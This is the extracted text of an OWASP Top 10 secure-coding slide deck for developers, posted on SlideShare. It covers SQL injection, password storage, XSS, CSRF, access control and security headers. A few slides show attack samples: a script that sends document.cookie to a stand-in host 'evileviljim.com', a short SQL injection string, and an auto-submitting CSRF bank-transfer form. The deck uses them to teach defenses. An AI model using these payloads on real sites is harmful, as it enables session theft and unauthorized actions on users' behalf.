SlideShare ist ein Scribd-Unternehmen logo

Application Security around OWASP Top 10

Sastry Tumuluri
Sastry Tumuluri

Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed. This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities. It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.

Software
1 von 87
Downloaden Sie, um offline zu lesen
1 Many thanks (content & inspiration) to: Jim Manico, Eoin Keary & Troy Hunt
WARNING This is an awareness document. There are more than 10 issues. You cannot secure an application based on a top ten list.
OWASP Top 10 - 2013
'; [1][1]
$NEW_EMAIL = Request['new_email']; update users set email='$NEW_EMAIL' where id=132005; SQL Injection
1. WHAT IF: $NEW_EMAIL = '; 2. update users set email='$NEW_EMAIL' where id=132005; 3. update users set email='';--' where id=132005; SQL Injection
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id); Query Parameterization (PHP PDO)
SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader(); Query Parameterization (.NET)
String newName = request.getParameter("newName"); String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id); Query Parameterization (Java)
# Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update Project.update_attributes(:name => 'owasp') Query Parameterization Failure (RoR)
OWASP Top 10 - 2013
Disable Browser Autocomplete <form AUTOCOMPLETE="off"> <input AUTOCOMPLETE="off"> Only send passwords over HTTPS POST Do not display passwords in browser Input type=password Store password based on need Use a salt (de-duplication) SCRYPT/PBKDF2 (slow, performance hit, easy) HMAC (requires good key storage, tough) [2][2]Password Defenses
1) Do not limit the type of characters or length* of user password •) Limiting passwords to protect against injection is doomed to failure •) Use proper encoder and other defenses described instead Password Storage
2) Use a Cryptographically strong credential-specific salt •) Protect ([salt] + [password]); •) Use a 32 char / 64 char salt (may depend on protection function) •) Do not depend on hiding / splitting / otherwise obscuring the salt Password Storage
3) Impose difficult verification on attacker ONLY •) HMAC-SHA256 ([private key], [salt] + [password]) •) Protect the key as any private key •) Store key outside the credential store ( •) Improvement over (solely) salted schemes; relies on proper key creation & management Password Storage
4) Impose difficult verification on both (impacts attacker more than defender) •) pbkdf2([salt] + [password], c=10,000,000); •) PBKDF2 when FIPS certification or enterprise support on many platforms required •) Scrypt when resisting hardware accelerated attacks is more important Password Storage
Basic MFA Considerations 17 • Where do you send the token? – Email (worst – yet, better than none!) – SMS (ok) – Mobile native app (good) – Dedicated token (great) – Printed Tokens (interesting) • How do you handle thick clients? – Email services, for example – Dedicated and strong per-app passwords
Basic MFA Considerations 18 • How do you handle unavailable MFA devices? – Printed back-up codes – Fallback mechanism (like email) – Call-in center • How do you handle mobile apps? – When is MFA not useful in mobile app scenarios?
“Forgot Password” design Require identity questions Last name, account number, email, DOB Enforce lockout policy Ask one or more good security questions https://www.owasp.org/index.php/Choosing_and_Using_Security_Ques tions_Cheat_Sheet Send the user a randomly generated token via out-of-band email, SMS or hardware / software token generator Verify code in same web session Enforce lockout policy Change password Enforce password policy
OWASP Top 10 - 2013
21 Video [3][3]Cross Site Scripting (XSS)
<script > var badURL = ‘https://evileviljim.com/somesite/data=‘ + document.cookie; var img = new Image(); img.src = badURL; </script> <script>document.body.innerHTML=‘<blink>CYBER IS COOL</blink>’;</script> Anatomy of an XSS Attack
Impact of XSS – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
XSS Prevention (.NET) • WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%> • WebForms v4.0+ <%data%> • MVC3+ Razor View Engine @data • Data Binding in Web Forms v4 and below <%#Server.HtmlEncode(Eval(“property”))%> • Data Binding in v4.5 <%#Item.Property%> • Better: ASP.Net 3.5 and below use AntiXss library directly Microsoft.Security.Application.Encoder.HtmlEncode(message)
XSS Prevention (.NET) • ASP.Net 4 (WebForms and MVC) <httpRuntime encoderType= “Microsoft.Security.Application.AntiXssEncoder,AntiXssLibr ary”/> • ASP.Net 4.5 (AntiXss included in this version!) <httpRuntime encoderType=”System.WebSecurity.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a”/> • JSON(MVC) Json.Encode(Model) • Javascript encoding using AntiXss Encoder.JavaScriptEncode(Model.FirstName)
<
&lt;
• No third party libraries or configuration necessary • This code was designed for high-availability/high- performance encoding functionality • Simple drop-in encoding functionality • Performance, ESAPI integration • More complete API (uri and uri component encoding, etc) in some regards • Java 1.5+ • Last updated January 30, 2014 (version 1.1.1) https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project
Web Page built in Java JSP is vulnerable to XSSWeb Page built in Java JSP is vulnerable to XSS OWASP Java Encoder Project Problem Solution 1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" /> 2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" /> 3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> click me </button> 4) <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(message) %>"; alert(msg); </script>
HTML Contexts Encode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute (String) XML Contexts Encode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String) CSS Contexts Encode#forCssString(String) Encode#forCssUrl(String) JavaScript Contexts Encode#forJavaScript(String) Encode#forJavaScriptAttribute(String) Encode#forJavaScriptBlock(String) Encode#forJavaScriptSource(String) URI/URL contexts Encode#forUri(String) Encode#forUriComponent(String) OWASP Java Encoder Project
<script src="/my-server-side-generated-script"> class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) { response.setContentType("text/javascript; charset=UTF-8"); PrintWriter w = response.getWriter(); w.println("function() {"); w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');"); w.println("}"); } } <script src="/my-server-side-generated-script"> class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) { response.setContentType("text/javascript; charset=UTF-8"); PrintWriter w = response.getWriter(); w.println("function() {"); w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');"); w.println("}"); } } OWASP Java Encoder Project
Other Encoding Libraries • Ruby on Rails – http://api.rubyonrails.org/classes/ERB/Util.html • Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP – https://www.owasp.org/index.php/Category:OWASP_Encodin g_Project • ESAPI – PHP.NET, Python, Classic ASP, Cold Fusion – https://www.owasp.org/index.php/Category:OWASP_Enterpri se_Security_API • .NET AntiXSS Library – http://wpl.codeplex.com/releases/view/80289
• Writte in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS • Has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-html-sanitizer/wiki/At tackReviewGroundRules • Very easy to use • Allows for simple programmatic POSITIVE policy configuration. No XML config. • << Caja project (Google) High performance & low memory utilization OWASP HTML Sanitizer Project https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
Web Page is vulnerable to XSS because of untrusted HTMLWeb Page is vulnerable to XSS because of untrusted HTML PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML); PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML); Solving real world problems (using OWASP HTML Sanitizer) Problem Solution
• Pure JavaScript – http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer • Python – https://pypi.python.org/pypi/bleach • PHP – http://htmlpurifier.org/ – http://www.bioinformatics.org/phplabware/internal_utilities/htm Lawed/ • .NET – AntiXSS.getSafeHTML/getSafeHTMLFragment – http://htmlagilitypack.codeplex.com/ • Ruby on Rails – http://api.rubyonrails.org/classes/HTML.html Other HTML Sanitizers
• JavaScript encode and delimit untrusted data as quoted strings • Avoid use of HTML rendering methods like innerHTML – If you must do this, then sanitize untrusted HTML first • Avoid code execution contexts – eval(), setTimeout() or event handlers • When possible, treat untrusted data as display text only • To build dynamic interfaces, use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…) • Parse JSON with JSON.parse in the browser DOM-based XSS Defense
 SAFE use of JQuery  $(‘#element’).text(UNTRUSTED DATA);  UNSAFE use of JQuery  $(‘#element’).html(UNTRUSTED DATA);
OWASP Top 10 - 2013
39 [4][4]Insecure Direct Object Reference
40 Using fiddler an attacker can change the id and access more information Insecure Direct Object Reference
41 We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further: public Customer GetCustomer(Guid indirectId) { var customerId = IndirectReferenceMap.GetDirectReference(indirectId); } Insecure Direct Object Reference
OWASP Top 10 - 2013
[5][5]Security Misconfiguration Is it really the developers' work? Or the sysadmins? If the developers don't know, how will the application security design be complete? What about configuring in Dev & Testing environments?
• Harden the Operating System – BIOS & grub passwords; secure physical access – Use multiple partitions (not default install); use options like ro, nosuid,noexec,nodev --make-runbindable ... – Remove all unnecessary packages & drivers (e.g., do you really need Xorg? All those fonts?) – Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, – SSH password-less login with SSH keygen – Enable ufw / iptables / … and a HIDS >> turn on remote logging – Oh yeah, regular patches & updates (wait!) – Regular backups! Hardening the servers (general)
• Run Tomcat under a Security Manager – http://tomcat.apache.org/tomcat-6.0-doc/security-manage r-howto.html – Modify $CATALINA_BASE/conf/catalina.policy PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, … – Configure package access (careful! test & debug!) $CATALINA_BASE/conf/catalina.properties – Restart Tomcat $CATALINA_HOME/bin/catalina.sh start -security (Unix) %CATALINA_HOME%bincatalina start -security (Windows) Secure Config Tips (Tomcat)
• More tips – http://www.tomcatexpert.com/blog/2011/11/02/best- practices-securing-apache-tomcat-7 – Use Security LifeCycle Listener – Lockdown connector interfaces – Disable shutdown port? – Secure your Web Manager – Configure AccessLogValve and RemoteAddrValve Secure Config Tips (Tomcat)
• Similar principles as Tomcat – Use the Java Security Manager – Configure policies and access permissions – Use Security Realms – Disable remote access to JMX – Configure TLS (SSL?) carefully remove old protos, weak crypto, renego, legacy support, etc. – Secure the Management interfaces (disable HTTP mgmt?) – ... Secure Config Tips (JBOSS)
5 things to remember here : • Error Handling (Enable Custom Errors) • Disable TRACE Securing web.config
• Disable Debugging • HTTP Only cookies Securing web.config
• Session State- UseCookies Securing web.config
• Steps : – Go to “C:WindowsMicrosoft.NETFrameworkv4.0.30319” using command prompt. aspnet_regiis.exe -pe "connectionStrings" “<path of Web.Config>” • Decrypting the web.config – Go to the same path aspnet_regiis.exe -pd "connectionStrings" “<path of Web.Config>” Encrypting web.config
• Before Encrypting References http://www.owasp.org http:// www.codeproject.com/Tips/795135/Encrypt-ConnectionString-in-Web-Config
• After Encrypting
OWASP Top 10 - 2013
55 [6][6]Sensitive Data Exposure
[8][8] <img src="https://google.com/logo.png"> <img src="https://google.com/deleteMail/7/confirm=true"> <form method="POST" action="https://mybank.com/transfer"> <input type="hidden" name="account" value="23532632"/> <input type="hidden" name="amount" value="1000"/> </form> <script>document.forms[0].submit()</script> Cross Site Request Forgery
57 How many are already “logged in”? Waiting to update your status, accept your credit card or email your friends What if another tab manages to send a request? What about others with the “remember me” checkbox? No need for tab to be open... just send a request and they'll happily accept! How many tabs on your browser?
58
59 Using fiddler we get the JSON
60
61
62 To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method: @using (Html.BeginForm("Manage", "Account")) { @Html.AntiForgeryToken() } This method adds the hidden form field and also sets the cookie token. <script> @functions { public string TokenHeaderValue() { string cookieToken, formToken; AntiForgery.GetTokens(null, out cookieToken, out formToken); return cookieToken + ":" + formToken; } } $.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON data goes here dataType: "json", headers: { 'RequestVerificationToken': '@TokenHeaderValue()' } }); </script> Anti-Forgery Tokens
63 void ValidateRequestHeader (HttpRequestMessage request) { string cookieToken = ""; string formToken = ""; IEnumerable<string> tokenHeaders; if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders)) { string[] tokens = tokenHeaders.First().Split(':'); if (tokens.Length == 2) { cookieToken = tokens[0].Trim(); formToken = tokens[1].Trim(); } } AntiForgery.Validate(cookieToken, formToken); }
OWASP Top 10 - 2013
if ((user.isManager() || user.isAdministrator() || user.isEditor()) && (user.id() != 1132)) { //execute action } How do you change the policy of this code? [7][7] Access Control
• Authorization: The process where a system determines whether a specific user has access to a resource • Permission: Represents app behavior only • Entitlement: What a user is actually allowed to do • Principle/User: Who/what you are entitling • Implicit Role: Named permission, user associated – if (user.isRole(“Manager”)); • Explicit Role: Named permission, resource associated – if (user.isAuthorized(“report:view:3324”); What is Access Control
• Hard-coded role checks in application code • Lack of centralized access control logic • Untrusted data driving access control decisions • Access control that is “open by default” • Lack of addressing horizontal access control in a standardized way (if at all) • Access control logic that needs to be manually added to every endpoint in code • Access Control that is “sticky” per session • Access Control that requires per-user policy Access Control DON'Ts
• Vertical Access Control Attacks – A standard user accessing administration functionality • Horizontal Access Control Attacks – Same role, but accessing another user's private data • Business Logic Access Control Attacks – Abuse of one or more linked activities that collectively realize a business objective Attacks on Access Control
• Loss of accountability – Attackers maliciously execute actions as other users – Attackers maliciously execute higher level actions • Disclosure of confidential data – Compromising admin-level accounts often results in access to user’s confidential data • Data tampering – Privilege levels do not distinguish users who can only view data and users permitted to modify data Impact of poor Access Control
• Apache Shiro is a powerful and easy to use Java security framework • Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management • Built on sound interface-driven design and OO principles • Enables custom behavior • Sensible and secure defaults for everything Apache SHIRO http://shiro.apache.org/
Web Application needs secure access control mechanismWeb Application needs secure access control mechanism if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely."); } else { log.info("Sorry, lightsaber rings are for schwartz masters only."); } if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely."); } else { log.info("Sorry, lightsaber rings are for schwartz masters only."); } Problem Solution Solving real world Access Control problems
int winnebagoId = request.getInt("winnebago_id"); if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); } else { log.info("Sorry, you aren't allowed to drive this winnebago!"); } int winnebagoId = request.getInt("winnebago_id"); if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); } else { log.info("Sorry, you aren't allowed to drive this winnebago!"); } Solving real world Access Control problems Web Application needs secure access to a specific objectWeb Application needs secure access to a specific object Problem Solution
“GET” exposes sensitive authentication information in the URL In Web Server and Proxy Server logs In the http referer header         In Bookmarks/Favorites often emailed to others “POST” places information in the body of the request and not the URL Enforce HTTPS POST For Sensitive Data Transport 73 HTTP: POST vs GET [E1]
» X-Frame-Options » X-XSS-Protection » X-Content-Type-Options » Content Security Policy » Access-Control-Allow-Origin » HTTPS Strict Transport Security » Cache-Control / Pragma HTTP Response Headers (security related)
Protects you from most classes of Clickjacking X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN X-Frame-Options: ALLOW FROM X-Frame-Options
X-XSS-Protection Use the browser’s built in XSS Auditor X-XSS-Protection: [0-1](; mode=block)? X-XSS-Protection: 1; mode=block
Fixes mime sniffing attacks Only applies to IE X-Content-Type-Options = ‘nosniff’ X-ContentType-Options
• Anti-XSS W3C standard http://www.w3.org/TR/CSP/ • Move all inline script and style into external files • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use • Define a policy for the site regarding loading of content • Chrome version 25 and later (50%) • Firefox version 23 and later (30%) • Internet Explorer version 10 and later (10%) Content Security Policy
Add the following as part of your HTTP Response Cache-Control: no-store, no-cache, must-revalidate Expires: -1 Disabling the browser cache
[E2][E2]Application Layer Intrusion Detection • Great detection points to start with – Input validation failure server side when client side validation exists – Input validation failure server side on non-user editable parameters (hidden fields, checkboxes, radio buttons or select lists) – Forced browsing to common attack entry points e.g., /admin/secretlogin.jsp or honeypot URL (a fake path listed in /robots.txt)
Application Layer Intrusion Detection • Others – Blatant SQLi or XSS injection attacks – Workflow sequence abuse (e.g. multi-part form in wrong order) – Custom business logic (e.g. basket vs catalogue price mismatch)
OWASP AppSensor (Java) • Project and mailing list https://www.owasp.org/index.php/OWASP_ AppSensor_Project • Four-page briefing, Crosstalk, Journal of Defense Software Engineering • http://www.crosstalkonline.org/storage/iss ue-archives/2011/201109/201109- Watson.pdf
[E3][E3]Encryption in transit • Confidentiality, Integrity (in Transit) and Authenticity – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL – Starting when the login form is rendered until logout is complete • HTTPS configuration best practices – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh eet • HSTS (Strict Transport Security) – http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000 • Certificate Pinning – https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Strict-transport-security: max-age=10000000 Do all of your subdomains support SSL? Strict-transport-security: max-age=10000000; includeSubdomains Strict Transport Security (HSTS) protected void Application_BeginRequest(Object sender, EventArgs e) { switch (Request.Url.Scheme) { case "https": Response.AddHeader("Strict-Transport-Security", "max- age=31536000"); break; case "http": var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery; Response.Status = "301 Moved Permanently"; Response.AddHeader("Location", path); break; } } // in global.asax
• What is Pinning – Pinning is a key continuity scheme – Detect when an imposter with a fake but CA validated certificate attempts to act like the real server • 2 Types of pinning • Carry around a copy of the server’s public key; – Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance • Note of the server’s public key on first use (Trust-on-First-Use, Tofu) – Useful when no a priori knowledge exists, such as SSH or a Browser • https://www.owasp.org/index.php/Pinning_Cheat_Sheet Certificate Pinning
File Upload Security • Upload Verification – Filename and Size validation + antivirus • Upload Storage – Use only trusted filenames + separate domain • Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml". • Image Upload Verification – Enforce proper image size limits – Use image rewriting libraries – Set the extension of the stored image to be a valid image extension – Ensure the detected content type of the image is safe • Generic Upload Verification – Ensure decompressed size of file < maximum size – Ensure that an uploaded archive matches the type expected (zip, rar) – Ensure structured uploads such as an add-on follow proper standard [E4][E4]
Thank you!

Empfohlen

Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
Preventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StancePreventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 

Empfohlen

Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
Preventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StancePreventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Onward15
Onward15Onward15
Onward15sarah_nadi
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychainAlexey Troshichev
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#Siddharth Bezalwar
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Xlator
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat Security Conference
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
Password Security
Password SecurityPassword Security
Password SecurityCSCJournals
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningSean Chittenden
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 

Weitere ähnliche Inhalte

Was ist angesagt?

[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Xlator
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat Security Conference
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
Password Security
Password SecurityPassword Security
Password SecurityCSCJournals
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningSean Chittenden
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 

Was ist angesagt? (20)

Onward15
Onward15Onward15
Onward15
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychain
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
 
